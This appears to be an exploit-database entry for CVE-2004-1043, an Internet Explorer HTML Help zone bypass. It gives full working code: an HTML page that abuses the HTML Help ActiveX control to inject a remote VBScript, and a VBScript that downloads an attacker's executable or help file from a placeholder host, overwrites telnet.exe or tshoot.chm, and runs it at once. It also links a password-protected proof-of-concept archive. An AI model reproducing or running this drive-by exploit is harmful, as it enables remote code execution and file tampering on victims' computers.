# Exploit Title: Microsoft Internet Explorer (CVE-2004-1043) - HTML Help Local Zone Bypass Vulnerability : Enhanced!

# Google Dork: N/A

# Date: June, 26, 2018

# Exploit Author: Eduardo Braun Prado

# Vendor Homepage: http://www.microsoft.com/

# Software Link: http://www.microsoft.com/

# Version: HTML Help Control v.4.74

# Tested on: Windows 98/ME/2000/XP (2003 is vulnerable too but you need to allow ActiveX and scripting on the Internet Zone of IE)

# CVE : CVE-2004-1043


MS IE HH Control Cross Domain Scripting vulnerability, enhanced to overwrite arbitrary local files and execute code instantly
without the need to save files to startup folder. This is accomplished through an ADO object that has pretty much the exact same functinoality
of the recently killbitted 'ADODB.Stream' object. This object was probably killbitted since lots of users, specially enterprises, were complaining
about allowing an ActiveX that is able to overwrite files on the system to be initialized. The problem is that Microsoft forgot about 'ADODB.Stream''s "cousin":
'ADODB.Record', which is even easier to use and requires less lines of code, but there's a small trick I had to use to get it to actually write files on
the target system.


Vulnerable versions of Windows (and the HH component) can be exploited by malicious people to inject script code in arbitrary domains,
including local files; In this case it's possible to run arbitrary code, by design, since it's the local machine zone of MS IE.
On XP SP2, an important feature that had just been introduced (Local Machine Zone Lockdown) could be defeated.

Below is code modified and improved by me, so it works on any version of Windows and run code instantly, without the need to save HTAs to
startup folder; Link for the full PoC which has the CHM file and the project that can be compiled using HTML Help Workshop program:


=FULL POC Link=

https://onedrive.live.com/?id=AFCB9116C8C0AAF4%21339&cid=AFCB9116C8C0AAF4


- download the file "HH_CVE-2004-1043_PoC_Enhanced.zip"

password: 2004


Below is the exploit, improved, so we don't have to guess the startup folder path (differs on Windows OS languages)
and run code instantly, without the need to reboot.


Important: Some PoCs over the internet has non-functional code to execute payloads via the 'HH Shortcut' feature.
The reason for it not working is that HH shortcut feature is only enabled to programs that invokes HH via HtmlHelp() API,
which is the case for Microsoft Help and Support Center, and thus the code I am providing INDEED WORKS!!



================================================================================================
HHxpl.htm
================================================================================================

<html>
<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\
PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>

<!-- in the 'javascript:' URL below change 'site.com' with your host/IP -->

<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:
execScript("document.write(unescape(\"%3Cscript%20language=vbs%20src=http://site.com/run_instantly.vbs%3e%3c/script%3e\"))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
</html>

================================================================================================
  run_instantly.vbs
================================================================================================

On Error Resume Next


customEXE="file.exe"
customCHM="tshoot.chm"

Set ar = CreateObject("ADODB.Record")

Set xmld = CreateObject("MSXML2.DomDocument")
a = xmld.load("file://C:/windows/pchealth/helpctr/system/sysinfo/msinfo.xml")

'check if target is running Windows XP with Help and Support Center feature.



If a = true Then

ar.Open customCHM,"URL=http://site.com/"  ' replace site.com with your host
ar.CopyRecord "","file://C:/windows/help/tshoot.chm"  ' overwrites the legitimate 'tshoot.chm' help file.

setTimeout "ExecCommandXP()",200,"VBScript"

Else

ar.Open customExe,"URL=http://site.com/"  ' replace site.com with your host
ar.CopyRecord "","file://C:/windows/system/telnet.exe"  ' overwrites the legitimate 'telnet.exe' file on Win 9x/ME

If Err.Number <> 0 Then

ar.CopyRecord "","file://C:/winnt/system32/telnet.exe"  ' overwrites the legitimate 'telnet.exe' file on Win NT/2000

End If

setTimeout "ExecCommandWin()",200,"VBScript"

End If


Sub ExecCommandXP()

document.write "<iframe src=hcp://help/tshoot/dvdregion.htm></iframe>"

End Sub


Sub ExecCommandWin()

document.write "<iframe src=telnet://127.0.0.1/></iframe>"

End Sub

=========================================EOF=======================================================

Cheers!